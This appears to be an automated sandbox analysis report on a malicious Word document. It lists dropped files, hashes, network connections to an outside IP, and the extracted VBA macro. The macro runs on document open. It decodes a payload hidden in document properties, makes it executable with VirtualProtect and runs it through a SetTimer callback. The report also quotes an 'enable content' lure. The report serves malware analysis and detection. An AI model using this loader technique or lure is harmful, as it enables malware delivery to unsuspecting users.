Reputation:moderate, very likely benign file
Preview:.PNG........IHDR...|...e......V.R.. .IDATx.....4.......~..:..t."...$......d..+...%Y.,V.(...7...03"""..O.......?>..y.}.v.&u......?0.....g.NH.............F...$..H.........km.%"D .=.f;..........A....O..w..,"n...U....N~?".....'...7w)A..l.+.....7....q|..q.7?............v.f...6....x._<.On.WLm..>s<.-....."............"_..~a....f=..7.....P.~...,gD..:.P..,.*.....c...;.B...q..1.>|.....R.7m...7.......,".p7%.M.".:...9..P.8.!..?.... .)".......A..Z..rA.).g.7..'QD.......@$.....*..oC. .6w...lP...lN..1X...H.................q....X{.s..A......w..I....l`..t.C87.p.k...H>r...).,..n...Dd.R.c..xHs.nWv.......>.j.WCi........a...}.t\_....A.q..t..^A..Q..g.,..P.h.n.nm....7....YYT.............jl.....yR>s...w......|.z..L.....\.FP.....QG...0.....2...@T.*....C.....M...;...i....Y8...R.Y*....~.;.CA........q....6`......~......2.g."...../..{x.( ...o..p...YW&+//[...........]....h....s....&...m_.)tG...s....<...].R..w..!.....A;.....I.,\.I@...&.....0[.\a?..`.#2upVW.4.{..c.JMZ..
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:PNG image data, 440 x 440, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):256042
Entropy (8bit):7.978343657002507
Encrypted:false
SSDEEP:6144:SD1K9VMjF68qkupr4FNRfRglzGWMOM+lQzPyWae2q:SDEVJBXkR63MWQOHq
MD5:303B22B7FFAF96496093E5DB3938B563
SHA1:672080C107AACED7AB0D77E5AA3055ECBFA494DC
SHA-256:AEF779CE0BA64FA155A6867374198754FCADABCBEB5C378A67A6B6846B18F0BB
SHA-512:49FD4F26EA3DCE9742D0E5C134C30EB535C58F0B42458AABF546FDD5C053845FC62C65B87AA99478A754A00146BAAA0A0088E926CABB7EE2E8FBDD2F6DEBA368
Malicious:false
Reputation:low
Preview:.PNG........IHDR.............7......sRGB.........gAMA......a.....pHYs..!...!..........IDATx^....fGU.s..8.3...?.3.hh..JTD%....$}#\U ..($!..&.HB.oI'!.`"i...\lE..d...r....9}O.5..<...[{.^]......K..j.U.j.Z...~....+<`..=$...X.....|......q..$2./....1..u...V^OF.N.W....z&_"...d....+*.t....Z.D.[.*#A.G.C...3..^.C..5.q.......`V.h.c`<.Z...23_..U^.?.Z....Un.f!.S..1.Y^i .Yo.o.....zH..'u.C....I.Y.+. ...2....... ...V.U....OZ-...f... n.5...m,.zec..'j>.=...t"i...+*..+O-O.....Z..Z.D-...-.h.....6N..zy.}...W..g..v.j...1:.^un...r0..D.+..k....VdY.@....j.+k..j>..8.=......^.m.VV/.<.....rH...[..m....Q.U.t[......:.......^..8.3]....-..I.h......r..gl.j..@.W.D..m.$-.3..AK.|.....Y6.N.>.z.....+...*=...m.^...cu@..t....t...*.....~....1..+..'z.D-.t..D.ky{a.~...+#.].6.....z...O$...[^.%j].KW....-..r.,!.H.@MW....W...*.....j..h..A[...t..7..e-....k{..my.y.kH.h.h..5.D...6].h.U..3.C[..6.B-.}..X.!Q.c.v.Z.....=.D..tm7..L.M..|.l../.........V....8..c........N..[Z.{m%.t.K.....|.m..
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):12288
Entropy (8bit):5.695659015516093
Encrypted:false
SSDEEP:192:XrKtQE9DBeLl+osxibSa8tTC9DBeLl+osxibSa:OtRdBeBfsxiYtedBeBfsxi
MD5:B14C599CC14F7210575E07FDC866C3EB
SHA1:5344704C5E6E89E9089756EA18DD67D516FF85C9
SHA-256:811A1B84CEC06FFB133423471C3FFAF90A52A9A4BAE7ABE1284D402EE4C514F4
SHA-512:023995D808E60A5AADADBD862D89E6CD1B9AA0A3C85FE7F45AEC230CC568F2B585962DAE3C068ED5B1CC577D12A47E3408130684648C96CCB82D08C858C1B147
Malicious:false
Reputation:low
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1024
Entropy (8bit):0.05390218305374581
Encrypted:false
SSDEEP:3:ol3lYdn:4Wn
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
Reputation:high, very likely benign file
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1536
Entropy (8bit):2.131668560158345
Encrypted:false
SSDEEP:12:DMlzfRLZRW4WZ1MFKuQ9cc3xn82lakwkv+4K4o4PllxHkUZ9/W4c:4LG1ND9Pxn82YkQH7YPH2z
MD5:782D491C039C3159E569A76FE51EE951
SHA1:65B2B2026550B9EB2801EEC8126A6020BB86DB7F
SHA-256:9AA4FE17BC800CE3E07964E969613C6C9450E4DB654C90D887CB4457CCAF7DFE
SHA-512:EA723E346E90A0AE00F19BF637D96B3297E2E2EB6DD56498B94EEFC1BA698AAF3D15A4B0BE49B63A32A58E82F1E7D2999F2D79F04AE5518411D0C1BC68A54850
Malicious:false
Reputation:low
Preview:.././...T.h.i.s. .d.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .p.r.e.v.i.o.u.s. .v.e.r.s.i.o.n. .o.f. .M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .W.o.r.d.....T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .. E.n.a.b.l.e. .e.d.i.t.i.n.g.. .b.u.t.t.o.n. .o.n. .t.h.e. .t.o.p. .b.a.r.,. .a.n.d. .t.h.e.n. .c.l.i.c.k. .. E.n.a.b.l.e. .c.o.n.t.e.n.t.. ..........................................................................................................................................................z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):60416
Entropy (8bit):4.160836053762578
Encrypted:false
SSDEEP:768:EWZ+iDUbA+Mce1WhQvXcLGxVT1kCd1L3Q2wp+TOWLHG9fo+pGFa3y:fQaJ+sWhQvXc2TqCd1jwQOwG/pGFaC
MD5:485E316369B1B3052319CD5C88638B7C
SHA1:20FD4D7BA397EECADEDA5112FDBF06C7525CD251
SHA-256:C75F488BC7F3E621BBDCD62454381607638B53E227FB4D7CE724FF0CFBFC7568
SHA-512:FA8A7A74A0E61D06C22589E67AE5F8B4F382720336F8F5F0383844D47595A9273BD183026A3606FC6B64ED99159D9F043560682D0C47910663D9F6F419699CB6
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:low
Preview:......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...........(........................................................................................................... ...!..."...#...$...%...&...'.......)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:.......<...=...>...?...@...A...K...C...D...E...F...G...H...I...J...;...L...M...N...O...P...Q...R...S.......`...V...W...X...Y...Z...]...\.......i..._...........b...c...d...e...f...g...h...[...j...k...t...m...n...o...p...q...r...s...^...........................
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:53 2022, mtime=Tue Mar 8 15:45:53 2022, atime=Fri Aug 12 01:24:12 2022, length=2255878, window=hide
Category:dropped
Size (bytes):1064
Entropy (8bit):4.571745374864595
Encrypted:false
SSDEEP:12:8ykCpgXg/XAlCPCHaXRBktB/eLX+W0/xgia6w4ticvbCfPxd96w4JDtZ3YilMMEW:8yn/XThOM2/xfa/eWfPxP+Dv3qNu7D
MD5:ACD2F7B50580C02888EF99600751FA8A
SHA1:581316D47DED63B69D3D16C58A8ED71B8F5FDB50
SHA-256:C4690451D2ABDE9049C123E466BC7A1413E4711CCED3D9255462D1FBBC6DBBF7
SHA-512:10003EE7AAD350FC9ACB282515D767A991F38117A0123F0562F06F167316EB4710DC6FC0932B7E337648446B43308C467CEAA42F7995C74E3B8C1727DA12EE9A
Malicious:false
Reputation:low
Preview:L..................F.... ....:...3...:...3...E3.....l"..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2..l"..U.. .ACTION~1.DOC..^......hT..hT..*...r.....'...............a.c.t.i.o.n.p.l.a.n. .d.o.c. .0.8...1.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\536720\Users.user\Desktop\actionplan doc 08.11.doc./.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.a.c.t.i.o.n.p.l.a.n. .d.o.c. .0.8...1.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......536720..........D_..
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):91
Entropy (8bit):4.656675625186696
Encrypted:false
SSDEEP:3:bDuMJlcGHQpxUMCmX1JdQpxUMCv:bCfxjwxjs
MD5:6102F29798F87437E24FEFC04A0F2955
SHA1:BE0A2C563433AFA7781D477223A3029C1A6BA45D
SHA-256:0A12578297ADAD563C7B4F4FC4FF79650D61FE1F105F2FC2B4449BAF1CD24C57
SHA-512:480E8BB320CE6EF2A1AE34B82259821B0C533ECB7DE199394283DE305161600553482ABE35894FDA95DB6484B8E86429BD85D43EF1DFBD5D14D96700FE28C77F
Malicious:false
Reputation:low
Preview:[folders]..Templates.LNK=0..actionplan doc 08.11.LNK=0..[doc]..actionplan doc 08.11.LNK=0..
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.503835550707525
Encrypted:false
SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
MD5:7CFA404FD881AF8DF49EA584FE153C61
SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
Malicious:false
Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Little-endian UTF-16 Unicode text, with no line terminators
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:Qn:Qn
MD5:F3B25701FE362EC84616A93A45CE9998
SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:false
Preview:..
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.503835550707525
Encrypted:false
SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
MD5:7CFA404FD881AF8DF49EA584FE153C61
SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
Malicious:false
Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
File type:Zip archive data, at least v2.0 to extract
Entropy (8bit):7.99386898063047
TrID:
  • Word Microsoft Office Open XML Format document (49504/1) 49.01%
  • Word Microsoft Office Open XML Format document (43504/1) 43.07%
  • ZIP compressed archive (8000/1) 7.92%
File name:actionplan doc 08.11.doc
File size:2349822
MD5:933338ca2c25cfda5c124455216d6709
SHA1:e518d12b7bb4addf1dc041a05575031890c1b4d7
SHA256:abc8d1097f0249c749f2c7d7058be1b39c88e21d26d45d76985c989289565214
SHA512:57d89f7b2319e6725bc72e06b3e00b13b4e23445a723bb84fc3d0d199b8546b7e30de68c4b90a3244aaad7b974c3e6bbe8695ab0cacac8aef18ccceae3c741c5
SSDEEP:49152:4ek4NG5JJHbICOlcYIHMwvTXaZ4D18AnhBmqB8Rplib7lFysec7htI:rkV5JJ7ILlcYIHTvTX/15v9bZFyseghi
TLSH:ACB5337CC120B149C3363F5C594A05B98C9F5E67F7C498395E2F680AE56EA2A4ED0ACC
File Content Preview:PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........|.zs..z..z.*X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q..*.;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.
Icon Hash:e4eea2aaa4b4b4a4
Document Type:OpenXML
Number of OLE Files:1
Has Summary Info:
Application Name:
Encrypted Document:False
Contains Word Document Stream:True
Contains Workbook/Book Stream:False
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:False
Flash Objects Count:0
Contains VBA Macros:True
General
Stream Path:VBA/ThisDocument
VBA File Name:ThisDocument.cls
Stream Size:2879
Data ASCII:. . . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t . i o n . . . L . i b " u s e r . 3 2 " A l i a . s " K i l l T . i m e r " ( B y V a l . . . . . . . ! A s L o n g / , . . . - . . . . ) .
Data Raw:01 1f b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function  Lib "user32" Alias "KillTimer" (ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
Private Declare PtrSafe Function  Lib "user32" Alias "SetTimer" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
Private Declare PtrSafe Function  Lib "kernel32" Alias "VirtualProtect" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr,  As LongPtr) As LongPtr
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
Function (, Optional  = False)
    If  Then
         = ()
    Else
         = ((), )
    End If
     = 
    End Function
Sub (w)
    Dim  As Long
    Dim  As Long
     = () + ()
    Do
         = ()
        DoEvents
    Loop Until  > 
End Sub
Function (, Optional  = Empty, Optional  = Empty, Optional  = Empty)
    Select Case 
            Case ()
                Set  = (, True)
            Case ()
                Set  = (, True)
            Case ()
                Set  = (True)
            Case ()
                Set  = (True)
            Case ()
                Set  = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, , True)
            Case ()
                 = (True)
            Case ()
                 = (, True)
        End Select
End Function
Function ()
     = 11
    End Function
Function ()
     = 3
    End Function
Function ()
     = 2
    End Function
Function (, Optional  = False)
    If  Then
         = UBound()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
    ReDim (() - 1) As Byte
    Dim  As Long,  As Long
    Dim :  = PtrvEuptBv("kEHTD0VxjLI") & PtrvEuptBv("ekIMqp0lkVPU")
    For  = 0 To () - 1 Step 2
         =  / 2
        () = 255 - ( & (, ) & (,  + 1))
    Next
     = 
End Function
Function (, Optional  = False)
    If  Then
        Set  = GetObject()
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function ()
     = 0
    End Function
Function (, )
     = Mid(,  + 1, 1)
End Function
Function (Optional  = False)
    If  Then
        Set  = ActiveDocument
    Else
        Set  = (())
    End If
    Set  = 
    End Function
Private Sub Document_Open()
    Dim () As Byte
    If () Then
         = ((PtrvEuptBv("VShd5QGbigR")).Value)
    Else
         = ((PtrvEuptBv("OEaDuboo")).Value)
    End If
    Dim  As LongPtr
    Dim  As LongPtr
    Dim  As LongPtr
    Dim  As LongPtr
     = () + 1
     = VarPtr((0))
     , , 64, VarPtr()
            ()(PtrvEuptBv("LoAWzznVLYGG")) = PtrvEuptBv("uKkubUM0aSP8u")
         = (0, , 1, )
     1
     0, 
    ().Remove (PtrvEuptBv("MyoLTf52tO2"))
    ().Remove (PtrvEuptBv("MeLFKrSW"))
    ReDim (1)
End Sub
Function (, Optional  = False)
    If  Then
         = Len()
    Else
         = ((), )
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
        Set  = CallByName((), PtrvEuptBv("qAzbQdWy"), VbGet, )
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Public Function PtrvEuptBv(strInput)
        PtrvEuptBv = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
    End Function
Function ()
     = 4
    End Function
Function ()
     = 5
    End Function
Function (Optional  = False)
    If  Then
        Set  = CallByName((PtrvEuptBv("k_qlfnX9")), PtrvEuptBv("FobMNFqWtNq6a"), VbGet, PtrvEuptBv("SLkPoakd"))
    Else
        Set  = (())
    End If
    Set  = 
    End Function
Function ()
    #If Win64 Then
         = True
    #Else
         = False
    #End If
End Function
Function (Optional  = False)
    If  Then
         = Timer()
    Else
         = (())
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
        Set  = CallByName((), PtrvEuptBv("gwno4Ujnar"), VbGet, )
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function (, , Optional  = False)
    If  Then
         = Mid(,  + 1, 1)
    Else
         = ((), , )
    End If
     = 
    End Function
Function ()
     = 6
    End Function
Function ()
     = 9
    End Function
Function ()
     = 10
    End Function
Function ()
     = 1
    End Function
Function ()
     = 7
    End Function
Function (, Optional  = False)
    If  Then
         = CDec()
    Else
         = ((), )
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
         = VarPtr()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
     = 8
    End Function

General
Stream Path:PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:357
Entropy:5.2699223718129895
Base64 Encoded:True
Data ASCII:I D = " { 8 C 3 6 5 0 1 C - 8 4 9 B - 4 4 8 9 - 8 3 5 7 - D 4 0 B 9 9 7 E 0 0 E 4 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 0 C 2 7 1 7 7 7 5 7 7 7 5 7 7 7 5 7 7 7 5 " . . D P B = " 8 0 8 2 3 1 3 2 3 2 3 2 3 2 3 2 " . . G C = " 4 0 4 2 F 1 F 2 F 2 F 2 F 2 0 D " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0 0 0 0 0
Data Raw:49 44 3d 22 7b 38 43 33 36 35 30 31 43 2d 38 34 39 42 2d 34 34 38 39 2d 38 33 35 37 2d 44 34 30 42 39 39 37 45 30 30 45 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
General
Stream Path:PROJECTwm
File Type:data
Stream Size:41
Entropy:3.0773844850752607
Base64 Encoded:False
Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
General
Stream Path:VBA/_VBA_PROJECT
File Type:ISO-8859 text, with no line terminators
Stream Size:7
Entropy:1.8423709931771088
Base64 Encoded:False
Data ASCII:a . . .
Data Raw:cc 61 ff ff 00 00 00
General
Stream Path:VBA/__SRP_2
File Type:data
Stream Size:5108
Entropy:1.9285410655228268
Base64 Encoded:False
Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . " . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:72 55 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 22 00 1f 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
General
Stream Path:VBA/__SRP_3
File Type:data
Stream Size:2724
Entropy:2.6979594211082003
Base64 Encoded:False
Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . P . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . ` . 1 . . . . . . . . . . . , . . p . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . X . . p . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 50 00 c1 08 00 00 00 00 00 00 00 00 00 00 00 00 04 70 08 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
General
Stream Path:VBA/dir
File Type:data
Stream Size:486
Entropy:6.304584198764293
Base64 Encoded:True
Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . 0 S d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ s y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c E C . . . . . m . ! O f f i c g O . f . i . c g . . g 2 D F 8 D 0 . 4 C - 5 B F A
Data Raw:01 e2 b1 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 30 53 f4 64 2d 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30
TimestampSource PortDest PortSource IPDest IP
Aug 11, 2022 19:23:43.895018101 CEST4917180192.168.2.2245.8.146.139
Aug 11, 2022 19:23:46.895924091 CEST4917180192.168.2.2245.8.146.139
Aug 11, 2022 19:23:52.902395964 CEST4917180192.168.2.2245.8.146.139
Aug 11, 2022 19:24:04.901994944 CEST4917280192.168.2.2245.8.146.139
Aug 11, 2022 19:24:07.910900116 CEST4917280192.168.2.2245.8.146.139
Aug 11, 2022 19:24:13.917491913 CEST4917280192.168.2.2245.8.146.139

Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Target ID:0
Start time:19:24:13
Start date:11/08/2022
Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):false
Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:0x13f3a0000
File size:1423704 bytes
MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Call Graph

  • Entrypoint
  • Decryption Function
  • Executed
  • Not Executed
  • Show Help
callgraph 1 Error: Graph is empty

Module: __Unknown_Module_Name__

Declaration
LineContent
Reset < >